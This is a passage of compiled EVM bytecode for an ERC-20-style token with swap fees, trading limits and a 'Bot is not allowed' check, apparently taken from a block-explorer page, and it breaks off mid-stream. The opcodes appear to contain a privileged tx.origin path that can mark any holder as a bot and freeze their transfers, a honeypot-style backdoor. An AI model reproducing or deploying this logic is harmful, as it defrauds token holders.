19497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600b5f9054906101000a900460ff1681565b60215481565b61149b611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611528576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151f9061322c565b60405180910390fd5b5f600267ffffffffffffffff811115611544576115436132d8565b5b6040519080825280602002602001820160405280156115725781602001602082028036833780820191505090505b509050601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156115df573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116039190613319565b815f8151811061161657611615613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050308160018151811061166557611664613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663b6f9de95835f8461dead426040518663ffffffff1660e01b81526004016117029493929190613461565b5f604051808303818588803b158015611719575f5ffd5b505af115801561172b573d5f5f3e3d5ffd5b50505050505050565b60225f9054906101000a900460ff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036117bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b29061351b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611829576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611820906135a9565b60405180910390fd5b8060195f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516119039190612df6565b60405180910390a3505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361197f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161197690613611565b60405180910390fd5b601a5f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff166119d357816119d5565b325b9050919050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611a4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a429061369f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611ab9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab09061372d565b60405180910390fd5b60225f9054906101000a900460ff16611b6757601a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611b55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b4c906137bb565b60405180910390fd5b611b608484846123db565b90506121ec565b60065f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611c05575060065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b611c44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c3b90613823565b60405180910390fd5b601a5f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611ce75750601f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611d20575061dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b8015611d4157506103e882611d3486610d89565b611d3e919061386e565b11155b15611da457600160065f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600190506121ec565b601f60149054906101000a900460ff1615611dcb57611dc48484846123db565b90506121ec565b611dd361100b565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614158015611e415750611e1161100b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b15611e5157611e5084836125a5565b5b5f611e5b30610d89565b90505f6008548210159050808015611e805750601f60149054906101000a900460ff16155b8015611ed35750601d5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611ee257611ee18261263f565b5b611f69846040518060400160405280601481526020017f496e73756666696369656e742042616c616e636500000000000000000000000081525060185f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b60185f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f601a5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806120465750601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b61205a576120558787876127ec565b61205c565b845b9050600b5f9054906101000a900460ff1680156120c05750601b5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156120ee57600a546120e3826120d589610d89565b61229e90919063ffffffff16565b11156120ed575f5ffd5b5b61213e8160185f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b60185f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516121dc9190612df6565b60405180910390a3600193505050505b9392505050565b5f83831115829061223a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122319190612e7f565b60405180910390fd5b505f8385612248919061386e565b9050809150509392505050565b5f61229683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506121f3565b905092915050565b5f5f82846122ac91906138a1565b9050838110156122f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122e89061391e565b60405180910390fd5b8091505092915050565b61232730601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff168461174d565b601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f5f61237161100b565b426040518863ffffffff1660e01b81526004016123939695949392919061393c565b60606040518083038185885af11580156123af573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906123d491906139af565b5050505050565b5f612463826040518060400160405280601481526020017f496e73756666696369656e742042616c616e636500000000000000000000000081525060185f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b60185f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506124f48260185f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b60185f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125929190612df6565b60405180910390a3600190509392505050565b600954811115806125fc5750601c5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b61263b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161263290613a49565b60405180910390fd5b5050565b6001601f60146101000a81548160ff0219169083151502179055505f612697600261268960175461267b60155487612a0690919063ffffffff16565b612a7d90919063ffffffff16565b612a7d90919063ffffffff16565b90505f6126ad828461225590919063ffffffff16565b90506126b881612ac6565b5f4790505f6126e76126d66002601554612a7d90919063ffffffff16565b60175461225590919063ffffffff16565b90505f61272460026127168461270860155488612a0690919063ffffffff16565b612a7d90919063ffffffff16565b612a7d90919063ffffffff16565b90505f61273a828561225590919063ffffffff16565b90505f8111156127705761276f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1682612d35565b5b5f8211801561277e57505f86115b156127c95761278d86836122fb565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618583886040516127c093929190613a67565b60405180910390a15b5050505050505f601f60146101000a81548160ff02191690831515021790555050565b5f5f5f9050601d5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561286f57612868606461285a600f5486612a0690919063ffffffff16565b612a7d90919063ffffffff16565b90506128ea565b601d5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156128e9576128e660646128d860135486612a0690919063ffffffff16565b612a7d90919063ffffffff16565b90505b5b5f8111156129e9576129428160185f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b60185f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516129e09190612df6565b60405180910390a35b6129fc818461225590919063ffffffff16565b9150509392505050565b5f5f8303612a16575f9050612a77565b5f8284612a239190613a9c565b9050828482612a329190613b0a565b14612a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a6990613baa565b60405180910390fd5b809150505b92915050565b5f612abe83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612d7d565b905092915050565b5f600267ffffffffffffffff811115612ae257612ae16132d8565b5b604051908082528060200260200182016040528015612b105781602001602082028036833780820191505090505b50905030815f81518110612b2757612b26613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612bcb573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612bef9190613319565b81600181518110612c0357612c02613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612c6930601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff168461174d565b601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612ccb959493929190613bc8565b5f604051808303815f87803b158015612ce2575f5ffd5b505af1158015612cf4573d5f5f3e3d5ffd5b505050507f32cde87eb454f3a0b875ab23547023107cfad454363ec88ba5695e2c24aa52a78282604051612d29929190613c20565b60405180910390a15050565b8173ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015612d78573d5f5f3e3d5ffd5b505050565b5f5f83118290612dc3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612dba9190612e7f565b60405180910390fd5b505f8385612dd19190613b0a565b9050809150509392505050565b5f819050919050565b612df081612dde565b82525050565b5f602082019050612e095f830184612de7565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612e5182612e0f565b612e5b8185612e19565b9350612e6b818560208601612e29565b612e7481612e37565b840191505092915050565b5f6020820190508181035f830152612e978184612e47565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612ecc82612ea3565b9050919050565b612edc81612ec2565b8114612ee6575f5ffd5b50565b5f81359050612ef781612ed3565b92915050565b612f0681612dde565b8114612f10575f5ffd5b50565b5f81359050612f2181612efd565b92915050565b5f5f60408385031215612f3d57612f3c612e9f565b5b5f612f4a85828601612ee9565b9250506020612f5b85828601612f13565b9150509250929050565b5f8115159050919050565b612f7981612f65565b82525050565b5f602082019050612f925f830184612f70565b92915050565b5f819050919050565b5f612fbb612fb6612fb184612ea3565b612f98565b612ea3565b9050919050565b5f612fcc82612fa1565b9050919050565b5f612fdd82612fc2565b9050919050565b612fed81612fd3565b82525050565b5f6020820190506130065f830184612fe4565b92915050565b5f61301682612ea3565b9050919050565b6130268161300c565b82525050565b5f60208201905061303f5f83018461301d565b92915050565b5f5f5f6060848603121561305c5761305b612e9f565b5b5f61306986828701612ee9565b935050602061307a86828701612ee9565b925050604061308b86828701612f13565b9150509250925092565b61309e81612ec2565b82525050565b5f6020820190506130b75f830184613095565b92915050565b5f60ff82169050919050565b6130d2816130bd565b82525050565b5f6020820190506130eb5f8301846130c9565b92915050565b5f6020828403121561310657613105612e9f565b5b5f61311384828501612ee9565b91505092915050565b5f5f6040838503121561313257613131612e9f565b5b5f61313f85828601612ee9565b925050602061315085828601612ee9565b9150509250929050565b5f6020828403121561316f5761316e612e9f565b5b5f61317c84828501612f13565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806131c957607f821691505b6020821081036131dc576131db613185565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613216602083612e19565b9150613221826131e2565b602082019050919050565b5f6020820190508181035f8301526132438161320a565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6132a4602683612e19565b91506132af8261324a565b604082019050919050565b5f6020820190508181035f8301526132d181613298565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f8151905061331381612ed3565b92915050565b5f6020828403121561332e5761332d612e9f565b5b5f61333b84828501613305565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f61339461338f61338a84613371565b612f98565b612dde565b9050919050565b6133a48161337a565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b6133dc81612ec2565b82525050565b5f6133ed83836133d3565b60208301905092915050565b5f602082019050919050565b5f61340f826133aa565b61341981856133b4565b9350613424836133c4565b805f5b8381101561345457815161343b88826133e2565b9750613446836133f9565b925050600181019050613427565b5085935050505092915050565b5f6080820190506134745f83018761339b565b81810360208301526134868186613405565b90506134956040830185613095565b6134a26060830184612de7565b95945050505050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613505602483612e19565b9150613510826134ab565b604082019050919050565b5f6020820190508181035f830152613532816134f9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613593602283612e19565b915061359e82613539565b604082019050919050565b5f6020820190508181035f8301526135c081613587565b9050919050565b7f544f4b454e3a2061646472657373207a65726f000000000000000000000000005f82015250565b5f6135fb601383612e19565b9150613606826135c7565b602082019050919050565b5f6020820190508181035f830152613628816135ef565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613689602583612e19565b91506136948261362f565b604082019050919050565b5f6020820190508181035f8301526136b68161367d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613717602383612e19565b9150613722826136bd565b604082019050919050565b5f6020820190508181035f8301526137448161370b565b9050919050565b7f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e64205f8201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c656400602082015250565b5f6137a5603f83612e19565b91506137b08261374b565b604082019050919050565b5f6020820190508181035f8301526137d281613799565b9050919050565b7f426f74206973206e6f7420616c6c6f77656400000000000000000000000000005f82015250565b5f61380d601283612e19565b9150613818826137d9565b602082019050919050565b5f6020820190508181035f83015261383a81613801565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61387882612dde565b915061388383612dde565b925082820390508181111561389b5761389a613841565b5b92915050565b5f6138ab82612dde565b91506138b683612dde565b92508282019050808211156138ce576138cd613841565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f613908601b83612e19565b9150613913826138d4565b602082019050919050565b5f6020820190508181035f830152613935816138fc565b9050919050565b5f60c08201905061394f5f830189613095565b61395c6020830188612de7565b613969604083018761339b565b613976606083018661339b565b6139836080830185613095565b61399060a0830184612de7565b979650505050505050565b5f815190506139a981612efd565b92915050565b5f5f5f606084860312156139c6576139c5612e9f565b5b5f6139d38682870161399b565b93505060206139e48682870161399b565b92505060406139f58682870161399b565b9150509250925092565b7f5458204c696d69742045786365656465640000000000000000000000000000005f82015250565b5f613a33601183612e19565b9150613a3e826139ff565b602082019050919050565b5f6020820190508181035f830152613a6081613a27565b9050919050565b5f606082019050613a7a5f830186612de7565b613a876020830185612de7565b613a946040830184612de7565b949350505050565b5f613aa682612dde565b9150613ab183612dde565b9250828202613abf81612dde565b91508282048414831517613ad657613ad5613841565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f613b1482612dde565b9150613b1f83612dde565b925082613b2f57613b2e613add565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f613b94602183612e19565b9150613b9f82613b3a565b604082019050919050565b5f6020820190508181035f830152613bc181613b88565b9050919050565b5f60a082019050613bdb5f830188612de7565b613be8602083018761339b565b8181036040830152613bfa8186613405565b9050613c096060830185613095565b613c166080830184612de7565b9695505050505050565b5f604082019050613c335f830185612de7565b8181036020830152613c458184613405565b9050939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212201faebb54d852790be294c50a6eb6ec8d5fad702cb5cea44059e7485c247d9f7f64736f6c634300081c0033

Deployed Bytecode

0x60806040526004361061026a575f3560e01c80638a8c523c11610143578063ac23ca59116100b5578063e693455c11610079578063e693455c1461093d578063f2fde38b14610967578063f872858a1461098f578063fb002c97146109b9578063fc155d1d146109e3578063ffb54a9914610a0b57610271565b8063ac23ca5914610847578063b54369d714610871578063c816841b1461089b578063c867d60b146108c5578063dd62ed3e1461090157610271565b806395d89b411161010757806395d89b4114610727578063a073d37f14610751578063a457c2d71461077b578063a844a9aa146107b7578063a9059cbb146107e1578063a9e8b1291461081d57610271565b80638a8c523c146106575780638da5cb5b1461066d5780639099feab146106975780639191a9c7146106c157806393575f20146106fd57610271565b80632b112e49116101dc5780636ebc2e5c116101a05780636ebc2e5c1461054b57806370a0823114610575578063715018a6146105b15780637d1db4a5146105c75780637f2930df146105f1578063807c2d9c1461062d57610271565b80632b112e49146104675780632baa7217146104915780632e97766d146104bb578063313ce567146104e5578063395093511461050f57610271565b80631694505e1161022e5780631694505e1461035957806318160ddd146103835780631a8145bb146103ad5780631f1ed673146103d757806323b872dd1461040157806327c8f8351461043d57610271565b806304140a0b1461027557806306fdde031461029f578063095ea7b3146102c95780630b9879bb1461030557806313d1228b1461032f57610271565b3661027157005b5f5ffd5b348015610280575f5ffd5b50610289610a35565b6040516102969190612df6565b60405180910390f35b3480156102aa575f5ffd5b506102b3610a3b565b6040516102c09190612e7f565b60405180910390f35b3480156102d4575f5ffd5b506102ef60048036038101906102ea9190612f27565b610acb565b6040516102fc9190612f7f565b60405180910390f35b348015610310575f5ffd5b50610319610ae8565b6040516103269190612df6565b60405180910390f35b34801561033a575f5ffd5b50610343610aee565b6040516103509190612df6565b60405180910390f35b348015610364575f5ffd5b5061036d610af4565b60405161037a9190612ff3565b60405180910390f35b34801561038e575f5ffd5b50610397610b19565b6040516103a49190612df6565b60405180910390f35b3480156103b8575f5ffd5b506103c1610b22565b6040516103ce9190612df6565b60405180910390f35b3480156103e2575f5ffd5b506103eb610b28565b6040516103f8919061302c565b60405180910390f35b34801561040c575f5ffd5b5061042760048036038101906104229190613045565b610b4e565b6040516104349190612f7f565b60405180910390f35b348015610448575f5ffd5b50610451610c2d565b60405161045e91906130a4565b60405180910390f35b348015610472575f5ffd5b5061047b610c51565b6040516104889190612df6565b60405180910390f35b34801561049c575f5ffd5b506104a5610c94565b6040516104b29190612df6565b60405180910390f35b3480156104c6575f5ffd5b506104cf610c9a565b6040516104dc9190612df6565b60405180910390f35b3480156104f0575f5ffd5b506104f9610ca1565b60405161050691906130d8565b60405180910390f35b34801561051a575f5ffd5b5061053560048036038101906105309190612f27565b610cb6565b6040516105429190612f7f565b60405180910390f35b348015610556575f5ffd5b5061055f610d64565b60405161056c919061302c565b60405180910390f35b348015610580575f5ffd5b5061059b600480360381019061059691906130f1565b610d89565b6040516105a89190612df6565b60405180910390f35b3480156105bc575f5ffd5b506105c5610dcf565b005b3480156105d2575f5ffd5b506105db610f1f565b6040516105e89190612df6565b60405180910390f35b3480156105fc575f5ffd5b50610617600480360381019061061291906130f1565b610f25565b6040516106249190612f7f565b60405180910390f35b348015610638575f5ffd5b50610641610f42565b60405161064e9190612df6565b60405180910390f35b348015610662575f5ffd5b5061066b610f48565b005b348015610678575f5ffd5b5061068161100b565b60405161068e91906130a4565b60405180910390f35b3480156106a2575f5ffd5b506106ab611032565b6040516106b89190612df6565b60405180910390f35b3480156106cc575f5ffd5b506106e760048036038101906106e291906130f1565b611038565b6040516106f49190612f7f565b60405180910390f35b348015610708575f5ffd5b50610711611055565b60405161071e9190612df6565b60405180910390f35b348015610732575f5ffd5b5061073b61105b565b6040516107489190612e7f565b60405180910390f35b34801561075c575f5ffd5b506107656110eb565b6040516107729190612df6565b60405180910390f35b348015610786575f5ffd5b506107a1600480360381019061079c9190612f27565b6110f4565b6040516107ae9190612f7f565b60405180910390f35b3480156107c2575f5ffd5b506107cb6111bc565b6040516107d89190612df6565b60405180910390f35b3480156107ec575f5ffd5b5061080760048036038101906108029190612f27565b6111c2565b6040516108149190612f7f565b60405180910390f35b348015610828575f5ffd5b506108316111e0565b60405161083e9190612df6565b60405180910390f35b348015610852575f5ffd5b5061085b6111e6565b6040516108689190612df6565b60405180910390f35b34801561087c575f5ffd5b506108856111ec565b6040516108929190612df6565b60405180910390f35b3480156108a6575f5ffd5b506108af6111f2565b6040516108bc91906130a4565b60405180910390f35b3480156108d0575f5ffd5b506108eb60048036038101906108e691906130f1565b611217565b6040516108f89190612f7f565b60405180910390f35b34801561090c575f5ffd5b506109276004803603810190610922919061311c565b611234565b6040516109349190612df6565b60405180910390f35b348015610948575f5ffd5b506109516112b6565b60405161095e9190612df6565b60405180910390f35b348015610972575f5ffd5b5061098d600480360381019061098891906130f1565b6112bc565b005b34801561099a575f5ffd5b506109a361147b565b6040516109b09190612f7f565b60405180910390f35b3480156109c4575f5ffd5b506109cd61148d565b6040516109da9190612df6565b60405180910390f35b3480156109ee575f5ffd5b50610a096004803603810190610a04919061315a565b611493565b005b348015610a16575f5ffd5b50610a1f611734565b604051610a2c9190612f7f565b60405180910390f35b600e5481565b606060018054610a4a906131b2565b80601f0160208091040260200160405190810160405280929190818152602001828054610a76906131b2565b8015610ac15780601f10610a9857610100808354040283529160200191610ac1565b820191905f5260205f20905b815481529060010190602001808311610aa457829003601f168201915b5050505050905090565b5f610ade610ad7611746565b848461174d565b6001905092915050565b600d5481565b600f5481565b601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f600754905090565b60205481565b600b60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f5f610b5933611910565b9050610b668585856119dc565b50610b7085611910565b9450610c218582610c1c86604051806060016040528060288152602001613c4f6028913960195f8c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b61174d565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000dead81565b5f610c8f610c7e7f000000000000000000000000000000000000000000000000000000000000dead610d89565b60075461225590919063ffffffff16565b905090565b60165481565b5f43905090565b5f60055f9054906101000a900460ff16905090565b5f610d5a610cc2611746565b84610d558560195f610cd2611746565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b61174d565b6001905092915050565b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610dd7611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5b9061322c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60095481565b601a602052805f5260405f205f915054906101000a900460ff1681565b600a5481565b610f50611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd49061322c565b60405180910390fd5b610fef610fe930610d89565b476122fb565b600160225f6101000a81548160ff021916908315150217905550565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60115481565b601d602052805f5260405f205f915054906101000a900460ff1681565b60105481565b60606002805461106a906131b2565b80601f0160208091040260200160405190810160405280929190818152602001828054611096906131b2565b80156110e15780601f106110b8576101008083540402835291602001916110e1565b820191905f5260205f20905b8154815290600101906020018083116110c457829003601f168201915b5050505050905090565b5f600854905090565b5f6111b2611100611746565b846111ad85604051806060016040528060258152602001613c776025913960195f611129611746565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b61174d565b6001905092915050565b60125481565b5f6111d56111ce611746565b84846119dc565b506001905092915050565b60145481565b60155481565b60135481565b601f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601b602052805f5260405f205f915054906101000a900460ff1681565b5f60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60175481565b6112c4611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611351576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113489061322c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113b6906132ba565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600b5f9054906101000a900460ff1681565b60215481565b61149b611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611528576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151f9061322c565b60405180910390fd5b5f600267ffffffffffffffff811115611544576115436132d8565b5b6040519080825280602002602001820160405280156115725781602001602082028036833780820191505090505b509050601e5f9054906101000a